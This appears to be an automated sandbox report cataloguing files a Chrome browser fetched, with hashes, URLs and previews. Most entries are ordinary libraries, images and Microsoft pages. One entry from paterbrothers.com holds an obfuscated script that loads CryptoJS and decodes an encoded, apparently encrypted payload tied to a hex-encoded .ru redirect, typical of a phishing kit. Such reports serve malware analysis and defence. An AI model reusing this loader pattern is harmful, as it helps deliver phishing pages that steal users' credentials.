                                                                                                        Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (47691)
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):47692
                                                                                                        Entropy (8bit):5.4016459163756165
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                                                        MD5:9046FDD8B20F930F537279DEDE41E747
                                                                                                        SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                                                        SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                                                        SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                                                        Malicious:false
                                                                                                        URL:https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.js
                                                                                                        Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:HTML document, ASCII text, with very long lines (955), with CRLF line terminators
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):201253
                                                                                                        Entropy (8bit):2.661810841903416
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:W7nJSq9GinOo20uqxjr3+AKyKEAPNPPn8P9R/3htzAVT+JcYY5WRItsWc7rQ3S01:WHGiOoHuOjr3+AKyKAXS
                                                                                                        MD5:85DE642E1467807F64F7E10807DF3869
                                                                                                        SHA1:C795B490811C0E5A1A8F3C3F620AAB9F00C34F07
                                                                                                        SHA-256:5965B2C5472AACA1CD66EA5B0D07A971B961FEE72FC27EB1F6C760042084B21B
                                                                                                        SHA-512:BF4EC56D6FC54EAAFBD57C4E4D06900D358E39CE15009FB983491B0A83ABB60A0A54F46BE86387AB837B4AE1D1F3FF99156D04207065B0F65F165B54CFAAF47B
                                                                                                        Malicious:false
                                                                                                        URL:https://www.microsoft.com/en-us/microsoft-365/outlook/email-and-calendar-software-microsoft-outlook?deeplink=%2fowa%2f&sdf=0
                                                                                                        Preview:..<!DOCTYPE html><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext".. xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us".. xmlns="http://www.w3.org/1999/xhtml"><head><link rel="shortcut icon".. href="//www.microsoft.com/favicon.ico?v2" /><link.. type="text/css" rel="stylesheet".. href="https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css".. /><title>Your request has been blocked. This could be.. due to several reasons.</title><meta name="Title".. content="We are sorry, the page you requested cannot be.. found" /><meta name="CorrelationVector".. content="VbLZYbRlhU2hyedN.1" /><meta name="Description".. content="" /><meta name="MscomContentLocale".. content="en-us" /><meta name="
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):47992
                                                                                                        Entropy (8bit):5.605846858683577
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                                        MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                                        SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                                        SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                                        SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                                        Malicious:false
                                                                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:PNG image data, 76 x 63, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):61
                                                                                                        Entropy (8bit):4.068159130770306
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:yionv//thPlRAtnlomNhBxl/k4E08up:6v/lhPctloGB7Tp
                                                                                                        MD5:1634B1E1BB841E406E367933967A0F10
                                                                                                        SHA1:00DA5DF62534CAD04F516787121D872B425B3248
                                                                                                        SHA-256:A0E8CA3B3E9DF69541063B3AD21C49D21BD2F02F41932E8430595AF6DA4D1881
                                                                                                        SHA-512:D9271B608AEBE64F488E56A82191574E2E7863201B89CC7CB2BE348F67DE2BEB2D0FB9477B1C65CFF63820B6B31E394AD6243F0A3F072E57377C9A66E6E12675
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...L...?......C......IDAT.....$.....IEND.B`.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):47992
                                                                                                        Entropy (8bit):5.605846858683577
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                                        MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                                        SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                                        SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                                        SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                                        Malicious:false
                                                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                                                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):15
                                                                                                        Entropy (8bit):3.189898095464287
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Uh1Kn:UDKn
                                                                                                        MD5:39A19D0882684989864FA50BCED6A2D1
                                                                                                        SHA1:5CED55DAC2E0427E9DC605CEC1FEDAB0949EB15E
                                                                                                        SHA-256:8FBEDED073249C3611742297EE96A976A95EE113F33B9A422A5D3A7A2DEB63E5
                                                                                                        SHA-512:E795CB7DE27B42948B7DDFF19F3B401A8F95753AC7D37D9B5F52D8DACD2AA43A2AD9EACEC29F77D28080E20C21C48B9FA88A733FAC108939FB2F0EB036C7AEEE
                                                                                                        Malicious:false
                                                                                                        URL:https://statics-marketingsites-wcus-ms-com.akamaized.net/statics/override.css?c=7
                                                                                                        Preview:/* empty css */
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (32089)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):92629
                                                                                                        Entropy (8bit):5.303443527492463
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:dnu00HWWaRxkqJg09pYxoxDKMXJrg8hXXO4dK3kyfiLJBhdSZE+I+Qg7rbaN1RUx:ddkWgoBhcZRQgmW42qe
                                                                                                        MD5:397754BA49E9E0CF4E7C190DA78DDA05
                                                                                                        SHA1:AE49E56999D82802727455F0BA83B63ACD90A22B
                                                                                                        SHA-256:C12F6098E641AACA96C60215800F18F5671039AECF812217FAB3C0D152F6ADB4
                                                                                                        SHA-512:8C64754F77507AB2C24A6FC818419B9DD3F0CECCC9065290E41AFDBEE0743F0DA2CB13B2FBB00AFA525C082F1E697CB3FFD76EF9B902CB81D7C41CA1C641DFFB
                                                                                                        Malicious:false
                                                                                                        Preview:/*! jQuery v1.9.1 | (c) 2005, 2012 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H)
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (47691)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):47692
                                                                                                        Entropy (8bit):5.4016459163756165
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                                                        MD5:9046FDD8B20F930F537279DEDE41E747
                                                                                                        SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                                                        SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                                                        SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                                                        Malicious:false
                                                                                                        Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):4054
                                                                                                        Entropy (8bit):7.797012573497454
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:zICvnyRHJ3BRZPcSPQ72N2xoiR4fTJX/rj4sFNMkk5/p1k2lPUmbm39o4aL7V9XH:10nvE724xoiRQJPrjpLKSFl9oX31Z1d
                                                                                                        MD5:9F14C20150A003D7CE4DE57C298F0FBA
                                                                                                        SHA1:DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
                                                                                                        SHA-256:112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                                                                        SHA-512:D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
                                                                                                        Malicious:false
                                                                                                        URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
                                                                                                        Preview:.PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                        Category:dropped
                                                                                                        Size (bytes):17174
                                                                                                        Entropy (8bit):2.9129715116732746
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                        MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                        SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                        SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                        SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                        Malicious:false
                                                                                                        Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (41651)
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):131537
                                                                                                        Entropy (8bit):5.2237799798561975
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:1f/HuF3CpxEIqQ0/9d1EwgXAnKxnKKviV:1f/HuZ1ILGV
                                                                                                        MD5:30B7C335C62E5269E2D35B8E8B9F44B4
                                                                                                        SHA1:C6D92B1516EB8F6D44AAF171FB24A1B2AADD0C4C
                                                                                                        SHA-256:10733A5D876108F81C5F78EEE5C9760A739D89C52FA6180C4290B7F909F24346
                                                                                                        SHA-512:5BCE247C84C88F993A857CE2F1E8540C648672DEB6D92A55BC808C33394B784C52866D635BEC8B7CD5E62A7EA4109569AC8BCD1381571B84592ACD6C5901D7A8
                                                                                                        Malicious:false
                                                                                                        URL:https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/shell/_scrf/js/themes=default/54-af9f9f/c0-247156/de-099401/e1-a50eee/e7-954872/d8-97d509/f0-251fe2/46-be1318/77-04a268/11-240c7b/63-077520/a4-34de62/1b-c96630/db-bc0148/dc-7e9864/78-4c7d22/e1-c35781/40-7b7803/cd-23d3b0/6d-1e7ed0/b7-cadaa7/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/92-10345d/79-499886/7e-cda2d3/db-f3b1fd/93-283c2d/e0-3c9860/91-97a04f/1f-100dea/33-abe4df/19-c0fae7?ver=2.0&iife=1
                                                                                                        Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):61
                                                                                                        Entropy (8bit):3.990210155325004
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (1341), with CRLF line terminators
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):1983
                                                                                                        Entropy (8bit):5.95098871302005
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:g7banZ1rLVdfFU+JlA/nSyxBuIAIz2bcB:ginZ1rikA62uIT
                                                                                                        MD5:4B434A784501D12D6017506B41FE2B1C
                                                                                                        SHA1:046D7E20E184B31389F7F9E8A3B80224CEC70ECD
                                                                                                        SHA-256:7828E172A624EAD2A6C180466C9E9F1B97C906DF9C52DFC8478773DE48B1EEF5
                                                                                                        SHA-512:403B0ED8F2A4A3E59EA5DCBE3235393CE64D468DE4F97DF5E49C940823C2819D4E33EDB86651ED57B86AE78B5771F80F77C21D8FF65A887E04BA5E9E600AC330
                                                                                                        Malicious:false
                                                                                                        URL:https://paterbrothers.com/res444.php?2-68747470733a2f2f44374d2e6b637a63796c766a7562752e72752f784a456f6233562f-butterbur
                                                                                                        Preview: var lcGtldNPbmTvJXcY = document.createElement("script");..lcGtldNPbmTvJXcY.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(lcGtldNPbmTvJXcY);..lcGtldNPbmTvJXcY.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoibjBTUU9IV1hlVEdkUkhJMXRIMUhDdmtHc1pLK0NiTlZPRE5mb2lKb0o2ZUFmS2VrRDcwTXlaUjdlbmRGbjc1eW0wY3d0cjY3WnphNkY1VUVHSk5JdmtDTDhPQjd0QzVtYXU2b3J6djhiQ0IxdGFucmN5SHN3a0NsYWRHNWFHUHRSb0tmRmtaajBQUzJRS3BGbnRYWUYxcGErbm1wUE9BQUxkNjltTzJrckdaRm1tdmVIeEFxbE5hNW43MVwvTGc3K3VOdzhoZFZwb3VNS2JoRDB0UE8yWmh4MEkrU3BxTWlEQWRVV3Y0WEJEMlB5YytYTmllTmdMeWxjMVduZlBOMzMwVk9Qa0g4WXBKRjNZUWhlZXA3MWRlQ1JKWW93cmlneG4zSDUrcUIwT2ZlWUU5MXY4dmlvWEdJSzR2WCsxbWhUVzhyWTAxM0xZZERGUVExQ1R6ekNOMXZORU1RSk10RmVsVjJLcGFYUDV6b3NuT3loR0FTRUI4NGlFOFZDQUthSVk1dmNqK2xVdHBrVnFPTkVOeCtiQWZQaFViYTB3em14akhDVnZvQVwvV0lHWGk0YVJVWCtYVUd2MlwvSUlQdE1XVW5wUEVEdktXVCtsZW1pbE5lNjlGQjlrQkFhWXVoRk1XamdiZEErVDYraWRTTnpieENBY1dlVzJlVk9hUys4a2JOSklUV0FWbkdwcWtMWD
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):48316
                                                                                                        Entropy (8bit):5.6346993394709
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                        MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                        Malicious:false
                                                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (32089)
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):92629
                                                                                                        Entropy (8bit):5.303443527492463
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:dnu00HWWaRxkqJg09pYxoxDKMXJrg8hXXO4dK3kyfiLJBhdSZE+I+Qg7rbaN1RUx:ddkWgoBhcZRQgmW42qe
                                                                                                        MD5:397754BA49E9E0CF4E7C190DA78DDA05
                                                                                                        SHA1:AE49E56999D82802727455F0BA83B63ACD90A22B
                                                                                                        SHA-256:C12F6098E641AACA96C60215800F18F5671039AECF812217FAB3C0D152F6ADB4
                                                                                                        SHA-512:8C64754F77507AB2C24A6FC818419B9DD3F0CECCC9065290E41AFDBEE0743F0DA2CB13B2FBB00AFA525C082F1E697CB3FFD76EF9B902CB81D7C41CA1C641DFFB
                                                                                                        Malicious:false
                                                                                                        URL:https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
